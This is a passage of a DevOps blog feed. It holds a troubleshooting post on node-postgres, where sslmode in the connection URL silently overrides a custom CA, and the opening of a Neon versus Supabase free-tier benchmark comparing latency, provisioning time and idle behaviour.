              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the code almost everyone writes when a provider&#39;s certs chain to a private CA (Supabase, DigitalOcean managed Postgres, Crunchy Bridge, most internal platforms):</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> pg <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { readFileSync } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:fs&#x27;</span>;

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-attr">connectionString</span>: <span class="hljs-string">&#x27;postgresql://user:pass@db.example.com:5432/postgres?sslmode=require&#x27;</span>,
  <span class="hljs-attr">ssl</span>: {
    <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>),
  },
});

<span class="hljs-keyword">await</span> client.<span class="hljs-title function_">connect</span>();
<span class="hljs-comment">// =&gt; Error: self-signed certificate in certificate chain</span>
</code></pre><p>It reads like &quot;require TLS, and here is the CA to verify against&quot;. What actually happens: <code>pg-connection-string</code> parses <code>sslmode=require</code> from the URL into its own ssl configuration, and that parsed value takes precedence over the <code>ssl</code> object you passed. Your <code>ca</code> is gone. The connection attempts full verification against the system trust store, the private CA is not in it, and you get the self-signed error even though you are holding the right certificate in your hand.</p>
<p>The same code with the parameter removed from the URL works immediately:</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-comment">// no sslmode in the URL</span>
  <span class="hljs-attr">connectionString</span>: <span class="hljs-string">&#x27;postgresql://user:pass@db.example.com:5432/postgres&#x27;</span>,
  <span class="hljs-attr">ssl</span>: {
    <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>),
  },
});

<span class="hljs-keyword">await</span> client.<span class="hljs-title function_">connect</span>(); <span class="hljs-comment">// verified against your CA, connects fine</span>
</code></pre><p>Nothing about the error message points at the URL. That is what makes this trap expensive: every debugging instinct says &quot;wrong CA file&quot; or &quot;incomplete chain&quot;, and both are red herrings you can burn an hour on, like we did.</p>
<h2 id="h2-the-rule-to-remember" class="group relative scroll-mt-24">
        <a href="#h2-the-rule-to-remember" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The rule to remember
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-rule-to-remember"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><strong>Configure TLS in exactly one place.</strong> With node-postgres, that place should be the <code>ssl</code> option:</p>
<ul>
<li>Strip <code>sslmode</code> (and <code>sslcert</code>, <code>sslkey</code>, <code>sslrootcert</code>) out of connection strings your code receives, or never put them there.</li>
<li>Put everything TLS-related in the <code>ssl</code> object: <code>ca</code> for private CAs, plus client certs if you use them.</li>
<li>An <code>ssl</code> object with a <code>ca</code> implies verification. Never &quot;fix&quot; this error with <code>rejectUnauthorized: false</code>; that disables verification entirely and turns your database connection into a man-in-the-middle exercise.</li>
</ul>
<p>If the connection string comes from an environment variable you do not control, sanitize it:</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">const</span> url = <span class="hljs-keyword">new</span> <span class="hljs-title function_">URL</span>(process.<span class="hljs-property">env</span>.<span class="hljs-property">DATABASE_URL</span>);
url.<span class="hljs-property">searchParams</span>.<span class="hljs-title function_">delete</span>(<span class="hljs-string">&#x27;sslmode&#x27;</span>);

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-attr">connectionString</span>: url.<span class="hljs-title function_">toString</span>(),
  <span class="hljs-attr">ssl</span>: { <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>) },
});
</code></pre><h2 id="h2-it-gets-stranger-sslmode-does-not-mean-what-libpq-taught-you" class="group relative scroll-mt-24">
        <a href="#h2-it-gets-stranger-sslmode-does-not-mean-what-libpq-taught-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          It gets stranger: sslmode does not mean what libpq taught you
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-it-gets-stranger-sslmode-does-not-mean-what-libpq-taught-you"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you watched your Node process closely while reproducing this, you saw a warning that documents a second surprise:</p>
<pre><code>Warning: SECURITY WARNING: The SSL modes &#x27;prefer&#x27;, &#x27;require&#x27;, and &#x27;verify-ca&#x27;
are treated as aliases for &#x27;verify-full&#x27;.
In the next major version (pg-connection-string v3.0.0 and pg v9.0.0), these
modes will adopt standard libpq semantics, which have weaker security guarantees.
</code></pre><p>In libpq (the C library that psql and most languages&#39; drivers wrap), <code>sslmode=require</code> means &quot;encrypt, but do not verify the certificate&quot;. In current node-postgres, <code>require</code> is treated as <code>verify-full</code>: encrypt AND verify hostname AND chain. Stricter than what the same string means everywhere else, which is exactly why the failure above happens with providers on private CAs: psql connects happily with <code>sslmode=require</code> while your Node service refuses.</p>
<p>Two practical consequences:</p>
<ul>
<li>A connection string copied from provider docs (written with libpq semantics in mind) can work in psql and fail in Node with the same <code>sslmode=require</code>.</li>
<li>When pg v9 lands, the same string changes meaning again, to the weaker libpq behavior. If you rely on <code>sslmode=require</code> giving you verification today, that silently stops being true on upgrade. One more reason to own TLS in the <code>ssl</code> object and keep the URL clean. If you need the libpq behavior now, pg already supports <code>uselibpqcompat=true&amp;sslmode=require</code>.</li>
</ul>
<h2 id="h2-the-supabase-specifics-since-that-is-where-most-people-hit-this" class="group relative scroll-mt-24">
        <a href="#h2-the-supabase-specifics-since-that-is-where-most-people-hit-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Supabase specifics, since that is where most people hit this
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-supabase-specifics-since-that-is-where-most-people-hit-this"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Three details that compound the confusion when the provider is Supabase:</p>
<p><strong>Their certs chain to a private CA.</strong> Database connections present certificates signed by &quot;Supabase Root 2021 CA&quot;, not a public authority. Download the root from the dashboard (Database settings, SSL) and pass it via <code>ssl.ca</code>. With the URL trap above, this is the step that looks broken even when you did it right.</p>
<p><strong>Free-plan direct hosts are IPv6-only.</strong> <code>db.&lt;ref&gt;.supabase.co</code> has no A record. If your client runs on an IPv4-only network (most CI runners, many VPSes, lots of home ISPs), direct connections cannot work at all and you must use their Supavisor pooler instead: session mode on port 5432, transaction mode on 6543. The pooler presents the same private-CA chain, so the <code>ssl.ca</code> requirement follows you there.</p>
<p><strong>The pooler hostname varies per project.</strong> Our first benchmark project landed on <code>aws-1-eu-central-1.pooler.supabase.com</code> while most docs and tutorials show <code>aws-0-...</code>. Both clusters exist. Read your project&#39;s actual connection details from the dashboard or the Management API rather than pattern-matching a tutorial.</p>
<p>None of this is unique to Supabase; any provider with a private CA plus a pooler can serve the same combination. Supabase just happens to be where a lot of Node developers meet all three at once.</p>
<h2 id="h2-a-five-line-sanity-test-that-would-have-saved-us-an-hour" class="group relative scroll-mt-24">
        <a href="#h2-a-five-line-sanity-test-that-would-have-saved-us-an-hour" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A five-line sanity test that would have saved us an hour
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-a-five-line-sanity-test-that-would-have-saved-us-an-hour"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When TLS fails and you suspect the CA, test the chain without pg in the way:</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> tls <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:tls&#x27;</span>;
<span class="hljs-keyword">import</span> net <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:net&#x27;</span>;
<span class="hljs-keyword">import</span> { readFileSync } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:fs&#x27;</span>;

<span class="hljs-keyword">const</span> sock = net.<span class="hljs-title function_">connect</span>(<span class="hljs-number">5432</span>, <span class="hljs-string">&#x27;your-db-host&#x27;</span>, <span class="hljs-function">() =&gt;</span> {
  sock.<span class="hljs-title function_">write</span>(<span class="hljs-title class_">Buffer</span>.<span class="hljs-title function_">from</span>([<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">8</span>, <span class="hljs-number">4</span>, <span class="hljs-number">210</span>, <span class="hljs-number">22</span>, <span class="hljs-number">47</span>])); <span class="hljs-comment">// Postgres SSLRequest</span>
  sock.<span class="hljs-title function_">once</span>(<span class="hljs-string">&#x27;data&#x27;</span>, <span class="hljs-function">() =&gt;</span> {
    <span class="hljs-keyword">const</span> t = tls.<span class="hljs-title function_">connect</span>(
      { <span class="hljs-attr">socket</span>: sock, <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>), <span class="hljs-attr">servername</span>: <span class="hljs-string">&#x27;your-db-host&#x27;</span> },
      <span class="hljs-function">() =&gt;</span> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&#x27;authorized:&#x27;</span>, t.<span class="hljs-property">authorized</span>, t.<span class="hljs-property">authorizationError</span> ?? <span class="hljs-string">&#x27;&#x27;</span>)
    );
  });
});
</code></pre><p>Postgres TLS starts with an in-protocol handshake (that 8-byte <code>SSLRequest</code> message), so plain <code>openssl s_client</code> needs <code>-starttls postgres</code> for the same check. If this prints <code>authorized: true</code> while pg fails with the same CA, you are not fighting certificates. You are fighting configuration precedence, and the URL is the first place to look.</p>
<h2 id="h2-takeaways" class="group relative scroll-mt-24">
        <a href="#h2-takeaways" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Takeaways
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-takeaways"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><code>sslmode</code> in a node-postgres connection string overrides your <code>ssl</code> options object. Silently. Keep TLS config in the <code>ssl</code> object and keep <code>sslmode</code> out of your URLs.</li>
<li>node-postgres currently treats <code>require</code> as <code>verify-full</code>, unlike libpq. pg v9 will flip to libpq semantics, weakening what your existing strings mean.</li>
<li>Never reach for <code>rejectUnauthorized: false</code>. The fix is removing the conflicting URL parameter, not removing verification.</li>
<li>For Supabase specifically: grab their root CA, expect IPv6-only direct hosts on the free plan, and read the pooler hostname from your own project settings.</li>
</ul>
<p>The full context, with measured numbers around it, is in our <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase free tier benchmarks</a>, and the harness where we hit this is open at <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a> with a <a href="https://postgres-benchmarks.devops-daily.com/">live results dashboard</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase Free Tiers: We Benchmarked Both So You Don't Have To]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks</link>
      <description><![CDATA[We ran 320 timed operations against the Neon and Supabase free tiers from a same-region client: query latency, project creation, cold starts, and branching. The latency race is a tie, and the real differences are nothing like the marketing.]]></description>
      <pubDate>Wed, 10 Jun 2026 18:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[serverless]]></category><category><![CDATA[benchmarks]]></category>
      <content:encoded><![CDATA[<p>Pick any &quot;Neon vs Supabase&quot; thread on the internet and you will find the same spec-sheet ping pong: one side quotes storage limits, the other quotes monthly active users, and nobody has actually timed anything. Both platforms hand out free Postgres, both claim to be fast, and both free tiers have sharp edges that only show up when you run real operations against them.</p>
<p>So we ran real operations against them. 320 timed samples across nine operation types, both platforms in the same AWS region (eu-central-1, Frankfurt), measured from a client VM in the same metro so network distance could not put a thumb on the scale. Every raw sample, the harness that produced it, and a live dashboard are public, so you can check the math or rerun the whole thing yourself: explore the <a href="https://postgres-benchmarks.devops-daily.com/">live results dashboard</a> or read the harness at <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">The-DevOps-Daily/serverless-postgres-benchmarks</a>.</p>
<p>This is the free tier piece. Paid-tier operations (read replicas, compute resizing, Supabase branching) get their own article once those runs land.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>Query latency is a tie.</strong> Every connection path on both platforms lands at a 25 to 30 ms median for a full connect + TLS + auth + query cycle from a same-region client. Do not pick either platform for single-query speed.</li>
<li><strong>Project creation is closer than you think.</strong> Neon: 5.7 s median to a queryable database. Supabase: 7.4 s. Both have outliers above 11 s.</li>
<li><strong>The idle behavior is the real difference.</strong> Neon free databases scale to zero after 5 minutes and wake automatically in about 570 ms. Supabase free projects pause after 7 days of inactivity and stay down until you log in and restore them by hand.</li>
<li><strong>Branching only exists on one side.</strong> Neon free includes copy-on-write branches that arrive carrying the parent&#39;s data, queryable in 2.2 s. Supabase branching requires a paid plan and starts without data.</li>
<li><strong>Networking will surprise you.</strong> Supabase free-tier direct connections are IPv6-only. From an IPv4 client (most CI runners, many VPSes, most home networks) you must use their pooler, and the TLS chain is signed by Supabase&#39;s own CA.</li>
</ul>
<h2 id="h2-how-we-measured" class="group relative scroll-mt-24">
        <a href="#h2-how-we-measured" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we measured
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-we-measured"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The harness is a small TypeScript runner that drives each platform&#39;s management API plus a regular <code>pg</code> connection. The rules:</p>
<ul>
<li>Both platforms in <strong>aws eu-central-1</strong>, measured from a 2 vCPU VM in Frankfurt (1 to 2 ms from both).</li>
<li>Every operation runs repeatedly: 50 runs for latency paths, 20 for project creation and cold starts, 10 for branching. Reports use <strong>median and p95</strong>, never single runs.</li>
<li>Latency samples use a <strong>cold connection each time</strong>: connect, TLS handshake, auth, <code>select 1</code>, disconnect. That is what a serverless function pays per invocation without a warm pool, and it is a fairer test than hammering one warm session.</li>
<li>Every resource is created fresh, named <code>bench-*</code>, and deleted after the run.</li>
<li>Raw samples are committed to the repo with region, plan, and client metadata. The numbers below link to data, not to memory.</li>
</ul>
<p>Free plans on both sides, as of June 2026.</p>
<h2 id="h2-query-latency-stop-arguing-about-it" class="group relative scroll-mt-24">
        <a href="#h2-query-latency-stop-arguing-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Query latency: stop arguing about it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-query-latency-stop-arguing-about-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Five different connection paths, 50 cold-connection cycles each:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Query latency: cold connection, select 1 (median, 50 runs each)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;tickLabel&quot;:&quot;p95&quot;,&quot;caption&quot;:&quot;Full connect + TLS + auth + query cycle from a same-metro client.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, pooled&quot;,&quot;value&quot;:25.1,&quot;tick&quot;:36,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Neon, direct&quot;,&quot;value&quot;:29.4,&quot;tick&quot;:63.3,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, direct (IPv6)&quot;,&quot;value&quot;:27.9,&quot;tick&quot;:33.6,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, session pooler&quot;,&quot;value&quot;:29,&quot;tick&quot;:37.2,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, transaction pooler&quot;,&quot;value&quot;:29.9,&quot;tick&quot;:40.6,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>That is a 5 ms spread across ten thousand-ish kilometers of marketing. At equal network distance, the free tiers are latency-equivalent for a single query. The spread between the fastest and slowest path on the <em>same</em> platform is bigger than the spread between platforms.</p>
<p>The percentile view makes the tails visible too. Every one of the 250 samples, ranked:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;cdf&quot;,&quot;title&quot;:&quot;Query latency percentiles (50 cold connections per path)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Read p50 and p95 off the dashed lines. The long green tail is Neon direct.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon pooler&quot;,&quot;samples&quot;:[40.5,39,34.1,36,31,25,21.5,26.6,31.9,29.2,27.5,23.3,31.4,27.5,23.1,22,20.8,24.6,29.1,20.8,24.1,30.6,28.9,21.6,25.1,23,31.8,23.2,21.3,19.8,26.5,22.4,22.3,28.2,29.1,26.1,24.5,25.9,24.5,20.1,33,20.4,23,19.7,22.5,27.5,23.8,26.1,28.8,25.8],&quot;color&quot;:&quot;#10b981&quot;},{&quot;name&quot;:&quot;Neon direct&quot;,&quot;dash&quot;:&quot;6 5&quot;,&quot;samples&quot;:[37,24.7,31.1,29.9,73.8,63.3,42.3,66.2,45.6,49.9,43.9,28.4,27.9,37.4,29,29,24.5,25,27,32.7,34.6,39.2,26.2,32.8,29.4,27.9,34.7,29.8,33.2,26.3,27.5,33,36.6,32.4,30,33.9,26.7,30.7,26.3,25.9,29,26.7,26.8,26,24.7,26.8,27.8,29.5,27.2,24.1],&quot;color&quot;:&quot;#10b981&quot;},{&quot;name&quot;:&quot;Supabase direct (IPv6)&quot;,&quot;samples&quot;:[27,28.5,31.6,29.5,31.1,33.6,27.5,27.3,30.2,26.6,29.4,27.8,26.4,27.9,30,34.2,30.7,29.1,29.1,31.6,24.9,29.6,30.4,31.9,25,25.7,28,32.3,27.3,27.1,25.4,27.3,27.2,26.6,29.7,26.3,28.9,26.1,29.4,24.9,29.3,24.9,26.3,30.8,27.1,25.6,34.4,25.1,27.9,26.6],&quot;color&quot;:&quot;#38bdf8&quot;},{&quot;name&quot;:&quot;Supabase session&quot;,&quot;dash&quot;:&quot;6 5&quot;,&quot;samples&quot;:[37.2,34.7,28.5,34.3,31.4,32.7,37.3,29,36,35.7,32.3,31.2,27.6,34.2,28.8,27.5,30.6,28.4,28.3,26.5,27.3,28.9,29.5,34.2,24.3,29.7,29.9,24.6,27.2,26.7,27.9,29.4,33,29.3,33.7,25.3,27.4,29.8,26.1,28.4,31.2,25.8,25.1,27,27,34.1,23.3,24.8,37.8,30.9],&quot;color&quot;:&quot;#38bdf8&quot;}]}"></div><p>What this means in practice: latency should not be on your decision sheet at all. Region placement matters about 10x more than vendor choice, because every millisecond of client-to-region distance gets added to each of these numbers.</p>
<h2 id="h2-project-creation-both-are-fast-now" class="group relative scroll-mt-24">
        <a href="#h2-project-creation-both-are-fast-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Project creation: both are fast now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-project-creation-both-are-fast-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Time from the management API call to the first successful <code>select 1</code>, 20 runs each:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Median</th>
<th>p95</th>
<th>Range</th>
</tr>
</thead>
<tbody><tr>
<td>Neon</td>
<td>5.7 s</td>
<td>8.8 s</td>
<td>3.5 s to 13.6 s</td>
</tr>
<tr>
<td>Supabase</td>
<td>7.4 s</td>
<td>11.8 s</td>
<td>6.5 s to 11.9 s</td>
</tr>
</tbody></table>
<p>Two things stood out. First, both are genuinely fast: a complete, queryable Postgres in single-digit seconds. Supabase used to take minutes to provision a project; that reputation is outdated. Second, neither is consistent: Neon&#39;s fastest run was 3.5 s and its slowest 13.6 s, nearly a 4x spread, so do not build automation that assumes the median.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Project creation: API call to first successful query&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;20 runs each, aws eu-central-1, free plans, June 2026. Amber line is the median.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;samples&quot;:[6088.4,5801.6,5593.9,5573.1,13558,6011.9,5474.2,5775.9,5683.7,5528.4,5705.2,8568.3,3571.7,5765,5718.4,3462,5491.3,3927.3,8751.6,8803.3]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;samples&quot;:[7621.3,11884.2,7052.1,6492.8,8521.4,7380.4,6873.7,8101.3,9189,9933.4,6777.1,6947.2,7473.7,7936.5,6802.8,6921.1,7105.7,7337.1,11765,8402.1]}]}"></div><p>If your workflow creates databases programmatically (per-tenant databases, ephemeral test environments, agent-driven tooling), both free tiers can technically do it, but the caps differ wildly: Neon allows up to 100 projects on the free plan, Supabase allows 2 active projects per organization. For anything that creates databases in a loop, that single line of the spec sheet decides for you before any benchmark does.</p>
<h2 id="h2-idle-behavior-a-nap-versus-a-coma" class="group relative scroll-mt-24">
        <a href="#h2-idle-behavior-a-nap-versus-a-coma" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Idle behavior: a nap versus a coma
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-idle-behavior-a-nap-versus-a-coma"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the section that should actually drive your decision for side projects, and it is the one spec sheets describe worst.</p>
<p><strong>Neon</strong> free compute always scales to zero after 5 minutes of inactivity. You cannot turn that off on the free plan. The flip side: it wakes automatically on the next connection. We suspended and woke a database 20 times:</p>
<ul>
<li>Wake query (first query against suspended compute): <strong>568 ms median, 1.06 s p95</strong>, worst case 1.55 s.</li>
</ul>
